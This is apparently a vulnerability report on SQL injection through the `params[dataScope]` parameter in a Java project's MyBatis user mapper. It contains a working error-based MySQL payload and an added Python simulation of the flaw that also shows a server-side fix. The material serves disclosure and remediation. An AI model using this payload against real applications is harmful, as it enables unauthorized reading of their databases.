src/main/resources/mybatis/system/UserMapper.xml
There is a ${} in this mapper.
Search for selectUserList to see where this select id is used:
UserController.java
Query user information:
Follow the selectUserList method to see the specific implementation:
UserServiceImpl.java
The parameters in User are passed into the mapper for the SQL operation. Because dataScope is controllable, the vulnerability arises.
Verification:
Concatenate the URL and parameters according to the code:
Use error-based injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
Select database name:
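The chain described in the issue (request parameter `params[dataScope]` bound into a map, then pasted into the mapper SQL by `${params.dataScope}`) modelled as an added example in Python; this is not code from the issue or from the project. The mapper template, table and column names, and the map-binding and filtering helpers are constructed stand-ins: MyBatis documents `${}` as raw text substitution and `#{}` as a bound parameter, and the two render functions below reproduce exactly that difference with the issue's own `extractvalue` payload.

```python
"""
Added example (not code from the issue or the project). Models how a MyBatis
mapper that uses ${params.dataScope} turns a client-supplied request parameter
into executable SQL, contrasts it with #{} binding, and shows a hypothetical
server-side filter that drops client-supplied params[...] keys before binding.
The SQL template and table/column names are constructed placeholders.
"""
import re
from urllib.parse import urlencode, parse_qs, urlsplit

# Constructed stand-in for the dynamic SQL in UserMapper.xml (the real mapper
# text is not reproduced on the page). MyBatis pastes ${...} in as raw text.
MAPPER_SQL = (
    "select u.user_id, u.user_name from sys_user u "
    "where u.del_flag = '0' ${params.dataScope}"
)

# Error-based payload quoted in the issue (MySQL extractvalue()).
PAYLOAD = "and extractvalue(1,concat(0x7e,substring((select version()),1,32),0x7e))"


def lookup(params: dict, dotted: str):
    """Resolve 'params.dataScope' against a nested dict, like an OGNL path."""
    value = params
    for part in dotted.split("."):
        value = value[part]
    return value


def render_dollar(template: str, params: dict) -> str:
    """Mimic ${...}: the value is substituted into the SQL text unescaped."""
    return re.sub(r"\$\{([^}]+)\}", lambda m: str(lookup(params, m.group(1))), template)


def render_hash(template: str, params: dict):
    """Mimic #{...}: the SQL keeps a '?' and the value travels as a bound argument."""
    args = []

    def bind(m):
        args.append(lookup(params, m.group(1)))
        return "?"

    return re.sub(r"#\{([^}]+)\}", bind, template), args


def build_request_url(base: str, data_scope: str) -> str:
    """Build the verification URL from the issue: ?params[dataScope]=<payload>."""
    return base + "?" + urlencode({"params[dataScope]": data_scope})


def bind_query_params(url: str) -> dict:
    """Hypothetical stand-in for Spring MVC map binding: params[x]=y -> {'params': {'x': 'y'}}."""
    bound = {"params": {}}
    for key, values in parse_qs(urlsplit(url).query).items():
        m = re.fullmatch(r"params\[(\w+)\]", key)
        if m:
            bound["params"][m.group(1)] = values[0]
        else:
            bound[key] = values[0]
    return bound


def strip_client_params(bound: dict) -> dict:
    """Hypothetical mitigation: never accept params[...] from the request; the
    server sets dataScope itself (here an empty fragment, i.e. no extra filter)."""
    cleaned = {k: v for k, v in bound.items() if k != "params"}
    cleaned["params"] = {"dataScope": ""}
    return cleaned


def vulnerable_query(url: str) -> str:
    """Request -> map binding -> ${} substitution: the payload lands in the SQL."""
    return render_dollar(MAPPER_SQL, bind_query_params(url))


def hardened_query(url: str) -> str:
    """Same path with client-supplied params[...] discarded before rendering."""
    return render_dollar(MAPPER_SQL, strip_client_params(bind_query_params(url)))


if __name__ == "__main__":
    url = build_request_url("http://target/system/user/list", PAYLOAD)
    print(url)
    print(vulnerable_query(url))
    print(hardened_query(url))
    print(render_hash("select 1 from sys_user where user_name = #{userName}",
                      {"userName": PAYLOAD}))
```

Running the block prints the encoded verification URL, the SQL with `extractvalue(...)` spliced in after the `del_flag` filter, the same query with the client-supplied fragment dropped, and a `#{}` rendering in which the payload stays an argument rather than becoming SQL. The point for a fix is that a fragment such as dataScope cannot be parameterised with `#{}` because it is SQL, not a value; it therefore has to be generated server-side and never read from the request.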